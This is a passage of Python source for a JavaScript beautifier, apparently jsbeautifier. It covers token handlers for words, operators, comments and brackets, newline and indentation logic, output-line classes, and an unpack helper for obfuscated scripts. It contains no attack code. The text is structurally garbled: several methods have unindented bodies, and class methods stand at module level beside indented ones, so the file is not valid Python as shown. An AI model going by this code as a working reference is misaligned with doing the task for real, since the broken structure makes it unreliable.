                    self.print_newline(True)
        self.handlers[local_token.type](local_token)
    def unpack(self, source, evalcode=False):
        """Run the obfuscation unpackers over ``source`` before formatting.

        On UnpackingError the error is printed and '' is returned, so a
        failed unpack yields empty output rather than raising.
        """
        import jsbeautifier.unpackers as unpackers
        try:
            return unpackers.run(source, evalcode)
        except unpackers.UnpackingError as error:
            print('error:', error)
            return ''
def is_special_word(self, s):
return s in ['case', 'return', 'do', 'if', 'throw', 'else']
    def is_array(self, mode):
        """True when ``mode`` is the array-literal frame kind."""
        return mode == MODE.ArrayLiteral
    def is_expression(self, mode):
        """True when ``mode`` is any expression-like frame (expression,
        for-initializer, or conditional)."""
        return mode in [MODE.Expression, MODE.ForInitializer, MODE.Conditional]
    def allow_wrap_or_preserved_newline(self, current_token, force_linewrap = False):
        """Insert a soft line break before ``current_token`` when allowed.

        Breaks when the input had a newline here (and preserve_newlines is
        on), when ``force_linewrap`` is set, or when adding the token would
        push the line past wrap_line_length.
        """
        # never wrap the first token of a line.
        if self.output.just_added_newline():
            return
        if (self.opts.preserve_newlines and current_token.wanted_newline) or force_linewrap:
            self.print_newline(preserve_statement_flags = True)
        elif self.opts.wrap_line_length > 0:
            proposed_line_length = self.output.current_line.get_character_count() + len(current_token.text)
            # A pending space would also be emitted before the token.
            if self.output.space_before_token:
                proposed_line_length += 1
            if proposed_line_length >= self.opts.wrap_line_length:
                self.print_newline(preserve_statement_flags = True)
    def print_newline(self, force_newline = False, preserve_statement_flags = False):
        """Request a newline in the output.

        Unless ``preserve_statement_flags`` is set, open Statement frames
        (other than pending if/do blocks) are closed first -- a newline
        ends a brace-less statement.  Marks the frame multiline when a
        line break was actually added.
        """
        if not preserve_statement_flags:
            if self.flags.last_text != ';' and self.flags.last_text != ',' and self.flags.last_text != '=' and self.last_type != 'TK_OPERATOR':
                while self.flags.mode == MODE.Statement and not self.flags.if_block and not self.flags.do_block:
                    self.restore_mode()
        if self.output.add_new_line(force_newline):
            self.flags.multiline_frame = True
    def print_token_line_indentation(self, current_token):
        """At the start of a fresh output line, emit its indentation.

        With keep_array_indentation inside an array, the token's original
        leading whitespace is replayed verbatim; otherwise the frame's
        indentation level is applied.
        """
        if self.output.just_added_newline():
            line = self.output.current_line
            if self.opts.keep_array_indentation and self.is_array(self.flags.mode) and current_token.wanted_newline:
                line.push(current_token.whitespace_before)
                self.output.space_before_token = False
            elif self.output.set_indent(self.flags.indentation_level):
                self.flags.line_indent_level = self.flags.indentation_level
    def print_token(self, current_token, s=None):
        """Append token text (``s`` overrides ``current_token.text``).

        In raw mode the token is copied through untouched.  With
        comma_first, a comma left dangling at the end of the previous line
        is moved to the front of the current line.
        """
        if self.output.raw:
            self.output.add_raw_token(current_token)
            return
        if self.opts.comma_first and self.last_type == 'TK_COMMA' and self.output.just_added_newline():
            if self.output.previous_line.last() == ',':
                # Relocate the trailing comma to lead this line.
                self.output.previous_line.pop()
                self.print_token_line_indentation(current_token)
                self.output.add_token(',')
                self.output.space_before_token = True
        if s == None:
            s = current_token.text
        self.print_token_line_indentation(current_token)
        self.output.add_token(s);
def indent(self):
self.flags.indentation_level += 1
def deindent(self):
allow_deindent = self.flags.indentation_level > 0 and ((self.flags.parent == None) or self.flags.indentation_level > self.flags.parent.indentation_level)
if allow_deindent:
self.flags.indentation_level -= 1
    def set_mode(self, mode):
        """Push the current frame and enter a new one of kind ``mode``.

        The very first frame (no current flags) gets a synthetic previous
        frame so apply_base always has something to inherit from.
        """
        if self.flags:
            self.flag_store.append(self.flags)
            self.previous_flags = self.flags
        else:
            self.previous_flags = BeautifierFlags(mode)
        self.flags = BeautifierFlags(mode)
        self.flags.apply_base(self.previous_flags, self.output.just_added_newline())
        self.flags.start_line_index = self.output.get_line_number();
    def restore_mode(self):
        """Pop back to the enclosing frame (no-op on the root frame).

        Leaving a Statement frame also drops any indentation that turned
        out to be redundant for it.
        """
        if len(self.flag_store) > 0:
            self.previous_flags = self.flags
            self.flags = self.flag_store.pop()
            if self.previous_flags.mode == MODE.Statement:
                self.output.remove_redundant_indentation(self.previous_flags)
def start_of_object_property(self):
return self.flags.parent.mode == MODE.ObjectLiteral and self.flags.mode == MODE.Statement and \
((self.flags.last_text == ':' and self.flags.ternary_depth == 0) or (self.last_type == 'TK_RESERVED' and self.flags.last_text in ['get', 'set']))
    def start_of_statement(self, current_token):
        """Open a brace-less Statement frame when ``current_token`` begins one.

        Covers declarations (var/let/const), bare do/return/else bodies,
        the statement after a closed for/if/while header, label-like word
        sequences, and object-literal property values.  Returns True when
        a Statement frame was opened (and the frame was indented), else
        False.
        """
        if (
            (self.last_type == 'TK_RESERVED' and self.flags.last_text in ['var', 'let', 'const'] and current_token.type == 'TK_WORD') \
                or (self.last_type == 'TK_RESERVED' and self.flags.last_text== 'do') \
                or (self.last_type == 'TK_RESERVED' and self.flags.last_text== 'return' and not current_token.wanted_newline) \
                or (self.last_type == 'TK_RESERVED' and self.flags.last_text == 'else' and not (current_token.type == 'TK_RESERVED' and current_token.text == 'if' )) \
                or (self.last_type == 'TK_END_EXPR' and (self.previous_flags.mode == MODE.ForInitializer or self.previous_flags.mode == MODE.Conditional)) \
                or (self.last_type == 'TK_WORD' and self.flags.mode == MODE.BlockStatement \
                    and not self.flags.in_case
                    and not (current_token.text == '--' or current_token.text == '++')
                    and self.last_last_text != 'function'
                    and current_token.type != 'TK_WORD' and current_token.type != 'TK_RESERVED') \
                or (self.flags.mode == MODE.ObjectLiteral and \
                    ((self.flags.last_text == ':' and self.flags.ternary_depth == 0) or (self.last_type == 'TK_RESERVED' and self.flags.last_text in ['get', 'set'])))
                ):
            self.set_mode(MODE.Statement)
            self.indent()
            if self.last_type == 'TK_RESERVED' and self.flags.last_text in ['var', 'let', 'const'] and current_token.type == 'TK_WORD':
                self.flags.declaration_statement = True
            # Issue #276:
            # If starting a new statement with [if, for, while, do], push to a new line.
            # if (a) if (b) if(c) d(); else e(); else f();
            if not self.start_of_object_property():
                self.allow_wrap_or_preserved_newline(current_token, current_token.type == 'TK_RESERVED' and current_token.text in ['do', 'for', 'if', 'while'])
            return True
        else:
            return False
def get_token(self, offset = 0):
index = self.token_pos + offset
if index < 0 or index >= len(self.tokens):
return None
else:
return self.tokens[index]
    def handle_start_expr(self, current_token):
        """Handle an opening '(' or '[' token.

        Picks the frame kind for what follows (expression, array literal,
        for-initializer, conditional), decides whether a space or newline
        precedes the bracket based on the previous token, then pushes the
        frame, prints the bracket, and indents.
        """
        if self.start_of_statement(current_token):
            # The conditional starts the statement if appropriate.
            pass
        next_mode = MODE.Expression
        if current_token.text == '[':
            if self.last_type == 'TK_WORD' or self.flags.last_text == ')':
                # Subscript access (a[i]) rather than an array literal.
                if self.last_type == 'TK_RESERVED' and self.flags.last_text in Tokenizer.line_starters:
                    self.output.space_before_token = True
                self.set_mode(next_mode)
                self.print_token(current_token)
                self.indent()
                if self.opts.space_in_paren:
                    self.output.space_before_token = True
                return
            next_mode = MODE.ArrayLiteral
            if self.is_array(self.flags.mode):
                if self.flags.last_text == '[' or (
                    self.flags.last_text == ',' and (self.last_last_text == ']' or self.last_last_text == '}')):
                    # ], [ goes to a new line
                    # }, [ goes to a new line
                    if not self.opts.keep_array_indentation:
                        self.print_newline()
        else:
            # '(': choose the frame kind from the keyword that owns it.
            if self.last_type == 'TK_RESERVED' and self.flags.last_text == 'for':
                next_mode = MODE.ForInitializer
            elif self.last_type == 'TK_RESERVED' and self.flags.last_text in ['if', 'while']:
                next_mode = MODE.Conditional
            else:
                next_mode = MODE.Expression
        if self.flags.last_text == ';' or self.last_type == 'TK_START_BLOCK':
            self.print_newline()
        elif self.last_type in ['TK_END_EXPR', 'TK_START_EXPR', 'TK_END_BLOCK'] or self.flags.last_text == '.':
            # do nothing on (( and )( and ][ and ]( and .(
            # TODO: Consider whether forcing this is required. Review failing tests when removed.
            self.allow_wrap_or_preserved_newline(current_token, current_token.wanted_newline)
        elif not (self.last_type == 'TK_RESERVED' and current_token.text == '(') and self.last_type not in ['TK_WORD', 'TK_OPERATOR']:
            self.output.space_before_token = True
        elif (self.last_type == 'TK_RESERVED' and (self.flags.last_word == 'function' or self.flags.last_word == 'typeof')) or \
            (self.flags.last_text == '*' and self.last_last_text =='function'):
            # function() vs function (), typeof() vs typeof ()
            if self.opts.space_after_anon_function:
                self.output.space_before_token = True
        elif self.last_type == 'TK_RESERVED' and (self.flags.last_text in Tokenizer.line_starters or self.flags.last_text == 'catch'):
            # TODO: option space_before_conditional
            self.output.space_before_token = True
        elif current_token.text == '(' and self.last_type == 'TK_RESERVED' and self.flags.last_word == 'await':
            self.output.space_before_token = True
        # Support of this kind of newline preservation:
        # a = (b &&
        #      (c || d));
        if self.last_type in ['TK_EQUALS', 'TK_OPERATOR']:
            if not self.start_of_object_property():
                self.allow_wrap_or_preserved_newline(current_token)
        self.set_mode(next_mode)
        self.print_token(current_token)
        if self.opts.space_in_paren:
            self.output.space_before_token = True
        # In all cases, if we newline while inside an expression it should be indented.
        self.indent()
    def handle_end_expr(self, current_token):
        """Handle a closing ')' or ']' token: close any open Statement
        frames, apply space_in_paren padding, pop the frame, and print the
        bracket."""
        # statements inside expressions are not valid syntax, but...
        # statements must all be closed when their container closes
        while self.flags.mode == MODE.Statement:
            self.restore_mode()
        if self.flags.multiline_frame:
            self.allow_wrap_or_preserved_newline(current_token, current_token.text == ']' and self.is_array(self.flags.mode) and not self.opts.keep_array_indentation)
        if self.opts.space_in_paren:
            if self.last_type == 'TK_START_EXPR' and not self.opts.space_in_empty_paren:
                # empty parens are always "()" and "[]", not "( )" or "[ ]"
                self.output.space_before_token = False
                self.output.trim()
            else:
                self.output.space_before_token = True
        if current_token.text == ']' and self.opts.keep_array_indentation:
            # Print first so the ']' keeps the array's original indentation.
            self.print_token(current_token)
            self.restore_mode()
        else:
            self.restore_mode()
            self.print_token(current_token)
        self.output.remove_redundant_indentation(self.previous_flags)
        # do {} while () // no statement required after
        if self.flags.do_while and self.previous_flags.mode == MODE.Conditional:
            self.previous_flags.mode = MODE.Expression
            self.flags.do_block = False
            self.flags.do_while = False
    def handle_start_block(self, current_token):
        """Handle an opening '{' token.

        Looks ahead two tokens to decide between an object literal and a
        block statement, then applies the configured brace_style to choose
        whether the brace follows a space or starts a new line.
        """
        # Check if this is a BlockStatement that should be treated as a ObjectLiteral
        next_token = self.get_token(1)
        second_token = self.get_token(2)
        if second_token != None and \
            ((second_token.text == ':' and next_token.type in ['TK_STRING', 'TK_WORD', 'TK_RESERVED']) \
                or (next_token.text in ['get', 'set'] and second_token.type in ['TK_WORD', 'TK_RESERVED'])):
            # We don't support TypeScript,but we didn't break it for a very long time.
            # We'll try to keep not breaking it.
            if not self.last_last_text in ['class','interface']:
                self.set_mode(MODE.ObjectLiteral);
            else:
                self.set_mode(MODE.BlockStatement)
        else:
            self.set_mode(MODE.BlockStatement)
        empty_braces = (not next_token == None) and len(next_token.comments_before) == 0 and next_token.text == '}'
        empty_anonymous_function = empty_braces and self.flags.last_word == 'function' and \
            self.last_type == 'TK_END_EXPR'
        if self.opts.brace_style == 'expand' or \
            (self.opts.brace_style == 'none' and current_token.wanted_newline):
            if self.last_type != 'TK_OPERATOR' and \
                (empty_anonymous_function or
                    self.last_type == 'TK_EQUALS' or
                    (self.last_type == 'TK_RESERVED' and self.is_special_word(self.flags.last_text) and self.flags.last_text != 'else')):
                self.output.space_before_token = True
            else:
                self.print_newline(preserve_statement_flags = True)
        else: # collapse
            if self.last_type not in ['TK_OPERATOR', 'TK_START_EXPR']:
                if self.last_type == 'TK_START_BLOCK':
                    self.print_newline()
                else:
                    self.output.space_before_token = True
            else:
                # if TK_OPERATOR or TK_START_EXPR
                if self.is_array(self.previous_flags.mode) and self.flags.last_text == ',':
                    if self.last_last_text == '}':
                        # }, { in an array -- keep on the same line.
                        self.output.space_before_token = True
                    else:
                        self.print_newline()
        self.print_token(current_token)
        self.indent()
    def handle_end_block(self, current_token):
        """Handle a closing '}' token: close open Statement frames, break
        the line per brace_style (keeping '{}' together), pop the frame,
        and print the brace."""
        # statements must all be closed when their container closes
        while self.flags.mode == MODE.Statement:
            self.restore_mode()
        empty_braces = self.last_type == 'TK_START_BLOCK'
        if self.opts.brace_style == 'expand':
            if not empty_braces:
                self.print_newline()
        else:
            # skip {}
            if not empty_braces:
                if self.is_array(self.flags.mode) and self.opts.keep_array_indentation:
                    # Temporarily disable so the '}' line itself is indented
                    # by the beautifier, not copied from the source.
                    self.opts.keep_array_indentation = False
                    self.print_newline()
                    self.opts.keep_array_indentation = True
                else:
                    self.print_newline()
        self.restore_mode()
        self.print_token(current_token)
def handle_word(self, current_token):
    """Print an identifier or reserved word, choosing the separator
    (newline / space / nothing) from the previous token and current mode.

    Also maintains the do/while, if/else and switch-case bookkeeping flags
    that later tokens depend on.
    """
    # 'set'/'get' are only reserved inside object literals (accessors);
    # elsewhere they are plain identifiers.
    if current_token.type == 'TK_RESERVED' and self.flags.mode != MODE.ObjectLiteral and \
            current_token.text in ['set', 'get']:
        current_token.type = 'TK_WORD'

    # Inside an object literal, a reserved word followed by ':' is a key.
    if current_token.type == 'TK_RESERVED' and self.flags.mode == MODE.ObjectLiteral:
        next_token = self.get_token(1)
        if next_token.text == ':':
            current_token.type = 'TK_WORD'

    if self.start_of_statement(current_token):
        # The conditional starts the statement if appropriate.
        pass
    elif current_token.wanted_newline and \
            not self.is_expression(self.flags.mode) and \
            (self.last_type != 'TK_OPERATOR' or (self.flags.last_text == '--' or self.flags.last_text == '++')) and \
            self.last_type != 'TK_EQUALS' and \
            (self.opts.preserve_newlines or not (self.last_type == 'TK_RESERVED' and self.flags.last_text in ['var', 'let', 'const', 'set', 'get'])):
        # Preserve the author's newline before this word when it is safe.
        self.print_newline()

    if self.flags.do_block and not self.flags.do_while:
        if current_token.type == 'TK_RESERVED' and current_token.text == 'while':
            # do {} ## while ()
            self.output.space_before_token = True
            self.print_token(current_token)
            self.output.space_before_token = True
            self.flags.do_while = True
            return
        else:
            # do {} should always have while as the next word.
            # if we don't see the expected while, recover
            self.print_newline()
            self.flags.do_block = False

    # if may be followed by else, or not
    # Bare/inline ifs are tricky
    # Need to unwind the modes correctly: if (a) if (b) c(); else d(); else e();
    if self.flags.if_block:
        if (not self.flags.else_block) and (current_token.type == 'TK_RESERVED' and current_token.text == 'else'):
            self.flags.else_block = True
        else:
            while self.flags.mode == MODE.Statement:
                self.restore_mode()
            self.flags.if_block = False

    # 'case'/'default' labels: outdent back to the switch body level.
    if current_token.type == 'TK_RESERVED' and (current_token.text == 'case' or (current_token.text == 'default' and self.flags.in_case_statement)):
        self.print_newline()
        if self.flags.case_body or self.opts.jslint_happy:
            self.flags.case_body = False
            self.deindent()
        self.print_token(current_token)
        self.flags.in_case = True
        self.flags.in_case_statement = True
        return

    if current_token.type == 'TK_RESERVED' and current_token.text == 'function':
        if self.flags.last_text in ['}', ';'] or (self.output.just_added_newline() and not self.flags.last_text in ['[', '{', ':', '=', ',']):
            # make sure there is a nice clean space of at least one blank line
            # before a new function definition, except in arrays
            if not self.output.just_added_blankline() and len(current_token.comments_before) == 0:
                self.print_newline()
                self.print_newline(True)

        if self.last_type == 'TK_RESERVED' or self.last_type == 'TK_WORD':
            if self.last_type == 'TK_RESERVED' and self.flags.last_text in ['get', 'set', 'new', 'return', 'export', 'async']:
                self.output.space_before_token = True
            elif self.last_type == 'TK_RESERVED' and self.flags.last_text == 'default' and self.last_last_text == 'export':
                # 'export default function ...'
                self.output.space_before_token = True
            else:
                self.print_newline()
        elif self.last_type == 'TK_OPERATOR' or self.flags.last_text == '=':
            # foo = function
            self.output.space_before_token = True
        elif not self.flags.multiline_frame and (self.is_expression(self.flags.mode) or self.is_array(self.flags.mode)):
            # (function
            pass
        else:
            self.print_newline()

    if self.last_type in ['TK_COMMA', 'TK_START_EXPR', 'TK_EQUALS', 'TK_OPERATOR']:
        if not self.start_of_object_property():
            self.allow_wrap_or_preserved_newline(current_token)

    if current_token.type == 'TK_RESERVED' and current_token.text in ['function', 'get', 'set']:
        self.print_token(current_token)
        self.flags.last_word = current_token.text
        return

    # prefix decides what separates the previous token from this word.
    prefix = 'NONE'

    if self.last_type == 'TK_END_BLOCK':
        if not (current_token.type == 'TK_RESERVED' and current_token.text in ['else', 'catch', 'finally']):
            prefix = 'NEWLINE'
        else:
            if self.opts.brace_style in ['expand', 'end-expand'] or \
                    (self.opts.brace_style == 'none' and current_token.wanted_newline):
                prefix = 'NEWLINE'
            else:
                prefix = 'SPACE'
                self.output.space_before_token = True
    elif self.last_type == 'TK_SEMICOLON' and self.flags.mode == MODE.BlockStatement:
        # TODO: Should this be for STATEMENT as well?
        prefix = 'NEWLINE'
    elif self.last_type == 'TK_SEMICOLON' and self.is_expression(self.flags.mode):
        prefix = 'SPACE'
    elif self.last_type == 'TK_STRING':
        prefix = 'NEWLINE'
    elif self.last_type == 'TK_RESERVED' or self.last_type == 'TK_WORD' or \
            (self.flags.last_text == '*' and self.last_last_text == 'function'):
        prefix = 'SPACE'
    elif self.last_type == 'TK_START_BLOCK':
        prefix = 'NEWLINE'
    elif self.last_type == 'TK_END_EXPR':
        self.output.space_before_token = True
        prefix = 'NEWLINE'

    if current_token.type == 'TK_RESERVED' and current_token.text in Tokenizer.line_starters and self.flags.last_text != ')':
        # NOTE(review): 'else ' carries a trailing space — looks odd but
        # matches the upstream source; confirm before changing.
        if self.flags.last_text == 'else ' or self.flags.last_text == 'export':
            prefix = 'SPACE'
        else:
            prefix = 'NEWLINE'

    if current_token.type == 'TK_RESERVED' and current_token.text in ['else', 'catch', 'finally']:
        if self.last_type != 'TK_END_BLOCK' \
                or self.opts.brace_style == 'expand' \
                or self.opts.brace_style == 'end-expand' \
                or (self.opts.brace_style == 'none' and current_token.wanted_newline):
            self.print_newline()
        else:
            self.output.trim(True)
            # If we trimmed and there's something other than a close block before us
            # put a newline back in. Handles '} // comment' scenario.
            if self.output.current_line.last() != '}':
                self.print_newline()
            self.output.space_before_token = True
    elif prefix == 'NEWLINE':
        if self.last_type == 'TK_RESERVED' and self.is_special_word(self.flags.last_text):
            # no newline between return nnn
            self.output.space_before_token = True
        elif self.last_type != 'TK_END_EXPR':
            if (self.last_type != 'TK_START_EXPR' or not (current_token.type == 'TK_RESERVED' and current_token.text in ['var', 'let', 'const'])) and self.flags.last_text != ':':
                # no need to force newline on VAR -
                # for (var x = 0...
                if current_token.type == 'TK_RESERVED' and current_token.text == 'if' and self.flags.last_text == 'else':
                    self.output.space_before_token = True
                else:
                    self.print_newline()
        elif current_token.type == 'TK_RESERVED' and current_token.text in Tokenizer.line_starters and self.flags.last_text != ')':
            self.print_newline()
    elif self.flags.multiline_frame and self.is_array(self.flags.mode) and self.flags.last_text == ',' and self.last_last_text == '}':
        self.print_newline() # }, in lists get a newline
    elif prefix == 'SPACE':
        self.output.space_before_token = True

    self.print_token(current_token)
    self.flags.last_word = current_token.text

    if current_token.type == 'TK_RESERVED' and current_token.text == 'do':
        self.flags.do_block = True

    if current_token.type == 'TK_RESERVED' and current_token.text == 'if':
        self.flags.if_block = True
def handle_semicolon(self, current_token):
    """Print ';' and close the statement frames it terminates."""
    if self.start_of_statement(current_token):
        # A semicolon can itself begin (and immediately end) a statement;
        # no leading space is wanted in that case.
        self.output.space_before_token = False

    def _closable():
        # Keep if/do frames open so a following 'else'/'while' can attach.
        return (self.flags.mode == MODE.Statement
                and not self.flags.if_block
                and not self.flags.do_block)

    while _closable():
        self.restore_mode()

    self.print_token(current_token)
def handle_string(self, current_token):
    """Emit a string/regex/xml literal with the right leading whitespace."""
    if self.start_of_statement(current_token):
        # One difference from other statement starters: strings want at
        # least a space before them.
        self.output.space_before_token = True
    elif self.last_type in ['TK_RESERVED', 'TK_WORD']:
        self.output.space_before_token = True
    elif self.last_type in ['TK_COMMA', 'TK_START_EXPR', 'TK_EQUALS', 'TK_OPERATOR']:
        if not self.start_of_object_property():
            self.allow_wrap_or_preserved_newline(current_token)
    else:
        self.print_newline()
    self.print_token(current_token)
def handle_equals(self, current_token):
    """Print an assignment '=' with a space on each side."""
    # May open a new Statement frame; the call's side effect is all we need.
    self.start_of_statement(current_token)

    if self.flags.declaration_statement:
        # '=' inside a var/let/const line enables the special comma
        # line-breaking rules applied later in handle_comma.
        self.flags.declaration_assignment = True

    self.output.space_before_token = True
    self.print_token(current_token)
    self.output.space_before_token = True
def handle_comma(self, current_token):
    """Print ',' and decide whether a newline or a space follows it."""
    if self.flags.declaration_statement:
        if self.is_expression(self.flags.parent.mode):
            # do not break on comma, for ( var a = 1, b = 2
            self.flags.declaration_assignment = False

        self.print_token(current_token)

        if not self.flags.declaration_assignment:
            self.output.space_before_token = True
            # comma-first style: a newline seen before the comma may be
            # moved after it by the later fix-up pass.
            if self.opts.comma_first:
                self.allow_wrap_or_preserved_newline(current_token)
        else:
            self.flags.declaration_assignment = False
            self.print_newline(preserve_statement_flags=True)
        return

    self.print_token(current_token)

    in_object_literal = (self.flags.mode == MODE.ObjectLiteral
        or (self.flags.mode == MODE.Statement
            and self.flags.parent.mode == MODE.ObjectLiteral))

    if in_object_literal:
        if self.flags.mode == MODE.Statement:
            self.restore_mode()
        self.print_newline()
    else:
        # expression or do-block: items stay on the same line
        self.output.space_before_token = True
        # for comma-first, we want to allow a newline before the comma
        # to turn into a newline after the comma, which we will fixup later
        if self.opts.comma_first:
            self.allow_wrap_or_preserved_newline(current_token)
def handle_operator(self, current_token):
    """Print an operator token, computing whether a space belongs before
    and/or after it (unary vs binary detection, ternary depth, etc.)."""
    if self.start_of_statement(current_token):
        # The conditional starts the statement if appropriate.
        pass

    if self.last_type == 'TK_RESERVED' and self.is_special_word(self.flags.last_text):
        # return had a special handling in TK_WORD
        self.output.space_before_token = True
        self.print_token(current_token)
        return

    # hack for actionscript's import .*;
    if current_token.text == '*' and self.last_type == 'TK_DOT':
        self.print_token(current_token)
        return

    # ':' closing a case label: indent the case body and break the line.
    if current_token.text == ':' and self.flags.in_case:
        self.flags.case_body = True
        self.indent()
        self.print_token(current_token)
        self.print_newline()
        self.flags.in_case = False
        return

    if current_token.text == '::':
        # no spaces around the exotic namespacing syntax operator
        self.print_token(current_token)
        return

    # Allow line wrapping between operators in an expression
    if self.last_type == 'TK_OPERATOR':
        self.allow_wrap_or_preserved_newline(current_token)

    space_before = True
    space_after = True

    # Unary operators (and '+'/'-' in unary position) get no surrounding
    # spaces by default; the cases below selectively re-enable them.
    if current_token.text in ['--', '++', '!', '~'] \
            or (current_token.text in ['+', '-'] \
                and (self.last_type in ['TK_START_BLOCK', 'TK_START_EXPR', 'TK_EQUALS', 'TK_OPERATOR'] \
                    or self.flags.last_text in Tokenizer.line_starters or self.flags.last_text == ',')):
        space_before = False
        space_after = False

        # http://www.ecma-international.org/ecma-262/5.1/#sec-7.9.1
        # if there is a newline between -- or ++ and anything else we should preserve it.
        if current_token.wanted_newline and (current_token.text == '--' or current_token.text == '++'):
            self.print_newline(preserve_statement_flags = True)

        if self.flags.last_text == ';' and self.is_expression(self.flags.mode):
            # for (;; ++i)
            #      ^^ space wanted after the ';'
            space_before = True

        if self.last_type == 'TK_RESERVED':
            space_before = True
        elif self.last_type == 'TK_END_EXPR':
            space_before = not (self.flags.last_text == ']' and current_token.text in ['--', '++'])
        elif self.last_type == 'TK_OPERATOR':
            # a++ + ++b
            # a - -b
            space_before = current_token.text in ['--', '-','++', '+'] and self.flags.last_text in ['--', '-','++', '+']
            # + and - are not unary when preceeded by -- or ++ operator
            # a-- + b
            # a * +b
            # a - -b
            if current_token.text in ['-', '+'] and self.flags.last_text in ['--', '++']:
                space_after = True

        if self.flags.mode == MODE.BlockStatement and self.flags.last_text in ['{', ';']:
            # { foo: --i }
            # foo(): --bar
            self.print_newline()
    elif current_token.text == ':':
        if self.flags.ternary_depth == 0:
            # Colon is invalid javascript outside of ternary and object, but do our best to guess what was meant.
            space_before = False
        else:
            self.flags.ternary_depth -= 1
    elif current_token.text == '?':
        self.flags.ternary_depth += 1
    elif current_token.text == '*' and self.last_type == 'TK_RESERVED' and self.flags.last_text == 'function':
        # generator 'function*' — keep the star attached
        space_before = False
        space_after = False

    if space_before:
        self.output.space_before_token = True

    self.print_token(current_token)

    if space_after:
        self.output.space_before_token = True
def handle_block_comment(self, current_token):
    """Emit a '/* ... */' comment.

    Handles four shapes: raw passthrough (inside a 'preserve' directive),
    a directive comment itself, a single-line inline comment, and a
    multi-line comment re-indented either javadoc-style ('*'-led lines)
    or 'starless' (uniformly indented lines).
    """
    if self.output.raw:
        self.output.add_raw_token(current_token)
        if current_token.directives and current_token.directives.get('preserve') == 'end':
            # If we're testing the raw output behavior, do not allow a directive to turn it off.
            if not self.opts.test_output_raw:
                self.output.raw = False
        return

    if current_token.directives:
        # Directive comments sit on their own line; 'preserve:start'
        # switches the output into raw mode.
        self.print_newline(preserve_statement_flags = True)
        self.print_token(current_token)
        if current_token.directives.get('preserve') == 'start':
            self.output.raw = True
        self.print_newline(preserve_statement_flags = True)
        return

    # inline block
    if not self.acorn.newline.search(current_token.text) and not current_token.wanted_newline:
        self.output.space_before_token = True
        self.print_token(current_token)
        self.output.space_before_token = True
        return

    lines = self.acorn.lineBreak.split(current_token.text)
    javadoc = False
    starless = False
    last_indent = current_token.whitespace_before
    last_indent_length = len(last_indent)

    # block comment starts with a new line
    self.print_newline(preserve_statement_flags = True)
    if len(lines) > 1:
        # NOTE(review): blank lines yield falsy '' to any() here, so they
        # never disqualify the javadoc classification — confirm intentional.
        if not any(l for l in lines[1:] if ( l.strip() == '' or (l.lstrip())[0] != '*')):
            javadoc = True
        elif all(l.startswith(last_indent) or l.strip() == '' for l in lines[1:]):
            starless = True

    # first line always indented
    self.print_token(current_token, lines[0])
    for line in lines[1:]:
        self.print_newline(preserve_statement_flags = True)
        if javadoc:
            # javadoc: reformat and re-indent
            self.print_token(current_token, ' ' + line.lstrip())
        elif starless and len(line) > last_indent_length:
            # starless: re-indent non-empty content, avoiding trim
            self.print_token(current_token, line[last_indent_length:])
        else:
            # normal comments output raw
            self.output.add_token(line)

    self.print_newline(preserve_statement_flags = True)
def handle_comment(self, current_token):
    """Emit a '//' line comment, preserving own-line vs trailing position."""
    if current_token.wanted_newline:
        self.print_newline(preserve_statement_flags=True)
    else:
        # Trailing comment: tighten whitespace left at the end of the line.
        self.output.trim(True)

    self.output.space_before_token = True
    self.print_token(current_token)
    self.print_newline(preserve_statement_flags=True)
def handle_dot(self, current_token):
    """Emit '.' in a member chain, optionally forcing chained-call breaks."""
    # May open a Statement frame; only the side effect matters here.
    self.start_of_statement(current_token)

    if self.last_type == 'TK_RESERVED' and self.is_special_word(self.flags.last_text):
        self.output.space_before_token = True
    else:
        # Newlines before dots are generally preserved; after a ')' they
        # are forced when break_chained_methods is on — bar().baz() chains.
        force_break = self.flags.last_text == ')' and self.opts.break_chained_methods
        self.allow_wrap_or_preserved_newline(current_token, force_break)

    self.print_token(current_token)
def handle_unknown(self, current_token):
    """Print a token the tokenizer could not classify, verbatim."""
    self.print_token(current_token)
    # A token ending in a linefeed (e.g. a she-bang line) keeps its break.
    if current_token.text[-1] == '\n':
        self.print_newline()
def handle_eof(self, current_token):
    """End of input: close any statement frames still open."""
    # Unwind any open statements
    while self.flags.mode == MODE.Statement:
        self.restore_mode()
def mkdir_p(path):
    """Create *path* and any missing parents; an existing directory is OK.

    An empty path is a no-op. Any other OSError (including the path
    existing as a non-directory) propagates.
    """
    if not path:
        return
    try:
        os.makedirs(path)
    except OSError as err:  # Python >2.5
        if not (err.errno == errno.EEXIST and os.path.isdir(path)):
            raise
# Using object instead of string to allow for later expansion of info about each line
class OutputLine:
    """One physical output line: an indent level plus a list of text items."""

    def __init__(self, parent):
        self.__parent = parent          # owning Output; supplies indent config
        self.__character_count = 0      # rendered width, including indentation
        self.__indent_count = -1        # -1 means no indentation has been set
        self.__items = []               # text fragments composing the line
        self.__empty = True

    def get_character_count(self):
        return self.__character_count

    def is_empty(self):
        return self.__empty

    def set_indent(self, level):
        """Set the indent level; the indent counts toward the line width."""
        self.__character_count = self.__parent.baseIndentLength + level * self.__parent.indent_length
        self.__indent_count = level

    def last(self):
        """Return the most recently pushed item, or None if empty."""
        if not self.is_empty():
            return self.__items[-1]
        return None

    def push(self, input):
        self.__items.append(input)
        self.__character_count += len(input)
        self.__empty = False

    def pop(self):
        """Remove and return the last item (None if the line is empty)."""
        item = None
        if not self.is_empty():
            item = self.__items.pop()
            self.__character_count -= len(item)
            self.__empty = len(self.__items) == 0
        return item

    def remove_indent(self):
        """Drop one indent level (used to undo redundant indentation)."""
        if self.__indent_count > 0:
            self.__indent_count -= 1
            self.__character_count -= self.__parent.indent_length

    def trim(self):
        """Strip trailing single-space items from the end of the line."""
        while self.last() == ' ':
            # Bug fix: this previously read 'self._items.pop()', which is a
            # nonexistent attribute (the name-mangled list is self.__items)
            # and raised AttributeError whenever a trailing space existed.
            self.__items.pop()
            self.__character_count -= 1
            self.__empty = len(self.__items) == 0

    def toString(self):
        """Render the line: cached indent prefix plus the joined items."""
        result = ''
        if not self.is_empty():
            if self.__indent_count >= 0:
                result = self.__parent.indent_cache[self.__indent_count]
            result += ''.join(self.__items)
        return result
class Output:
    """Accumulates beautified output as a list of OutputLine objects."""

    def __init__(self, indent_string, baseIndentString = ''):
        # indent_string: text for one indent level.
        # baseIndentString: prefix applied to every line of the output.
        self.indent_string = indent_string
        self.baseIndentString = baseIndentString
        self.indent_cache = [ baseIndentString ]  # memoized indent prefixes by level
        self.baseIndentLength = len(baseIndentString)
        self.indent_length = len(indent_string)
        self.raw = False  # True while inside a 'beautify preserve' region
        self.lines = []
        self.previous_line = None
        self.current_line = None
        self.space_before_token = False  # pending single space before next token
